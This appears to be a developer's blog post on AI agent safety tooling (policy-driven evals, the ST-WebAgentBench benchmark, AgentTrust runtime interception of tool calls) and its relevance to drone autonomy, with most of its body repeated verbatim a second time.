Public
Agents Need Seatbelts: Runtime Safety + Open Evals Are Becoming the Default
The most interesting AI news right now isn’t a new model—it's the tooling ecosystem forming around agent safety: policy-driven evals, benchmarks that punish unsafe web behavior, and runtimes that can intercept risky tool calls before anything executes.

I’ve been watching “AI agents” go through the same awkward life cycle we’ve seen a dozen times in engineering:
1) **Demo era:** it works on a laptop, under perfect lighting.
2) **Production era:** it touches real systems and… surprise, *the world is adversarial.*
This week’s most important shift is that we’re finally in (2).
## The New Default: Evaluate Policies, Not Just Performance
Microsoft is pushing what they call an *open trust stack* for agents, with **ASSERT** framed as a policy-driven evaluation approach (not “did it finish the task?” but “did it obey the rules while doing it?”). The key message I’m taking: generic benchmarks don’t catch your real failures because they’re not wired to *your* policies. ([devblogs.microsoft.com](https://devblogs.microsoft.com/foundry/build-2026-open-trust-stack-ai-agents/?utm_source=openai))
That’s the exact lesson every robotics team learns the hard way:
- accuracy metrics don’t protect you from edge cases
- “success rate” doesn’t protect you from unsafe actions
- your constraints are the product
## Benchmarks Are Finally Getting Serious About Agent Misbehavior
**ST-WebAgentBench** (ICLR 2026) is notable because it evaluates web agents on safety + trustworthiness across enterprise-style tasks, not just raw completion. It’s basically a reminder that the web is a minefield: credentials, sensitive data, irreversible actions, shady downloads, prompt-injection… the whole carnival. ([openreview.net](https://openreview.net/forum?id=MuCDzH0ctf&utm_source=openai))
If you build any agent that browses, clicks, purchases, deploys, or edits—this is your “unit tests weren’t enough” moment.
## The Runtime Layer: Intercept Tool Calls Before They Fire
The most compelling idea I found is **AgentTrust** (arXiv May 2026): a runtime safety layer that can intercept each proposed tool action and return a verdict like **allow / warn / block / review**. This is the difference between:
- *post-hoc monitoring* (nice dashboard… after damage)
- *pre-execution control* (seatbelt + airbag)
They also release a benchmark suite and describe scenario categories for tool-use risk. ([arxiv.org](https://arxiv.org/abs/2605.04785?utm_source=openai))
This is the agent equivalent of “you don’t just log the syscall—you gate it.”
## Why I Care (And Why You Should) If You Build Robots or Drones
Here’s the bridge that matters:
A web agent’s “tool call” might be:
- run a shell command
- move money
- change infrastructure
A drone’s “tool call” is:
- change altitude
- commit to a trajectory
- fly beyond a geofence
- choose a landing site
So the stack we’re inventing for web agents—**policy evaluation, runtime interception, and adversarial benchmarks**—is conceptually the same safety architecture drones need as autonomy gets more agentic.
And yes, the regulatory pressure is real: the FAA has been actively moving toward normalizing BVLOS via rulemaking, which raises the stakes for reliable autonomy and governance layers. ([faa.gov](https://www.faa.gov/newsroom/us-transportation-secretary-sean-p-duffy-unveils-proposed-rule-unleash-american-drone?utm_source=openai))
## A Practical Take: What “Agent Seatbelts” Look Like in DevTools
If I were shipping an agent today (web, code, or embodied), I’d want:
- **Policy as code** (explicit, testable constraints)
- **Evals that include refusal + safe alternatives** (not just “task solved”)
- **Pre-execution gates** on tool calls (block/review paths)
- **Audit logs you can actually replay** (deterministic traces, not vibes)
- **Adversarial testing** (prompt injection, obfuscated commands, data exfil attempts)
If your agent can do anything meaningful, it can also do something meaningfully harmful. The gap between those is not “alignment.” It’s engineering.
## Why This Matters For Alshival
I’m building in the DevTools lane, and the agent wave is forcing a hard choice:
- Ship *magical demos* that feel good for 10 minutes.
- Or ship *governable systems* that teams can trust at 3AM on a Wednesday.
This week’s signal says the ecosystem is choosing the second path—benchmarks that punish unsafe behavior, policy-driven eval frameworks, and runtime interception patterns.
That’s the difference between agents being a novelty… and agents becoming infrastructure.
## Sources
- [Microsoft Foundry Blog — Build agents you can trust across any framework with open evals and a control standard](https://devblogs.microsoft.com/foundry/build-2026-open-trust-stack-ai-agents/)
- [OpenReview (ICLR 2026) — ST-WebAgentBench: A Benchmark for Evaluating Safety and Trustworthiness in Web Agents](https://openreview.net/forum?id=MuCDzH0ctf)
- [GitHub — ST-WebAgentBench repository](https://github.com/segev-shlomov/ST-WebAgentBench)
- [arXiv — AgentTrust: Runtime Safety Evaluation and Interception for AI Agent Tool Use](https://arxiv.org/abs/2605.04785)
- [FAA Newsroom — Proposed rule to normalize BVLOS flights (NPRM announcement)](https://www.faa.gov/newsroom/us-transportation-secretary-sean-p-duffy-unveils-proposed-rule-unleash-american-drone)
1) **Demo era:** it works on a laptop, under perfect lighting.
2) **Production era:** it touches real systems and… surprise, *the world is adversarial.*
This week’s most important shift is that we’re finally in (2).
## The New Default: Evaluate Policies, Not Just Performance
Microsoft is pushing what they call an *open trust stack* for agents, with **ASSERT** framed as a policy-driven evaluation approach (not “did it finish the task?” but “did it obey the rules while doing it?”). The key message I’m taking: generic benchmarks don’t catch your real failures because they’re not wired to *your* policies. ([devblogs.microsoft.com](https://devblogs.microsoft.com/foundry/build-2026-open-trust-stack-ai-agents/?utm_source=openai))
That’s the exact lesson every robotics team learns the hard way:
- accuracy metrics don’t protect you from edge cases
- “success rate” doesn’t protect you from unsafe actions
- your constraints are the product
## Benchmarks Are Finally Getting Serious About Agent Misbehavior
**ST-WebAgentBench** (ICLR 2026) is notable because it evaluates web agents on safety + trustworthiness across enterprise-style tasks, not just raw completion. It’s basically a reminder that the web is a minefield: credentials, sensitive data, irreversible actions, shady downloads, prompt-injection… the whole carnival. ([openreview.net](https://openreview.net/forum?id=MuCDzH0ctf&utm_source=openai))
If you build any agent that browses, clicks, purchases, deploys, or edits—this is your “unit tests weren’t enough” moment.
## The Runtime Layer: Intercept Tool Calls Before They Fire
The most compelling idea I found is **AgentTrust** (arXiv May 2026): a runtime safety layer that can intercept each proposed tool action and return a verdict like **allow / warn / block / review**. This is the difference between:
- *post-hoc monitoring* (nice dashboard… after damage)
- *pre-execution control* (seatbelt + airbag)
They also release a benchmark suite and describe scenario categories for tool-use risk. ([arxiv.org](https://arxiv.org/abs/2605.04785?utm_source=openai))
This is the agent equivalent of “you don’t just log the syscall—you gate it.”
## Why I Care (And Why You Should) If You Build Robots or Drones
Here’s the bridge that matters:
A web agent’s “tool call” might be:
- run a shell command
- move money
- change infrastructure
A drone’s “tool call” is:
- change altitude
- commit to a trajectory
- fly beyond a geofence
- choose a landing site
So the stack we’re inventing for web agents—**policy evaluation, runtime interception, and adversarial benchmarks**—is conceptually the same safety architecture drones need as autonomy gets more agentic.
And yes, the regulatory pressure is real: the FAA has been actively moving toward normalizing BVLOS via rulemaking, which raises the stakes for reliable autonomy and governance layers. ([faa.gov](https://www.faa.gov/newsroom/us-transportation-secretary-sean-p-duffy-unveils-proposed-rule-unleash-american-drone?utm_source=openai))
## A Practical Take: What “Agent Seatbelts” Look Like in DevTools
If I were shipping an agent today (web, code, or embodied), I’d want:
- **Policy as code** (explicit, testable constraints)
- **Evals that include refusal + safe alternatives** (not just “task solved”)
- **Pre-execution gates** on tool calls (block/review paths)
- **Audit logs you can actually replay** (deterministic traces, not vibes)
- **Adversarial testing** (prompt injection, obfuscated commands, data exfil attempts)
If your agent can do anything meaningful, it can also do something meaningfully harmful. The gap between those is not “alignment.” It’s engineering.
## Why This Matters For Alshival
I’m building in the DevTools lane, and the agent wave is forcing a hard choice:
- Ship *magical demos* that feel good for 10 minutes.
- Or ship *governable systems* that teams can trust at 3AM on a Wednesday.
This week’s signal says the ecosystem is choosing the second path—benchmarks that punish unsafe behavior, policy-driven eval frameworks, and runtime interception patterns.
That’s the difference between agents being a novelty… and agents becoming infrastructure.
## Sources
- [Microsoft Foundry Blog — Build agents you can trust across any framework with open evals and a control standard](https://devblogs.microsoft.com/foundry/build-2026-open-trust-stack-ai-agents/)
- [OpenReview (ICLR 2026) — ST-WebAgentBench: A Benchmark for Evaluating Safety and Trustworthiness in Web Agents](https://openreview.net/forum?id=MuCDzH0ctf)
- [GitHub — ST-WebAgentBench repository](https://github.com/segev-shlomov/ST-WebAgentBench)
- [arXiv — AgentTrust: Runtime Safety Evaluation and Interception for AI Agent Tool Use](https://arxiv.org/abs/2605.04785)
- [FAA Newsroom — Proposed rule to normalize BVLOS flights (NPRM announcement)](https://www.faa.gov/newsroom/us-transportation-secretary-sean-p-duffy-unveils-proposed-rule-unleash-american-drone)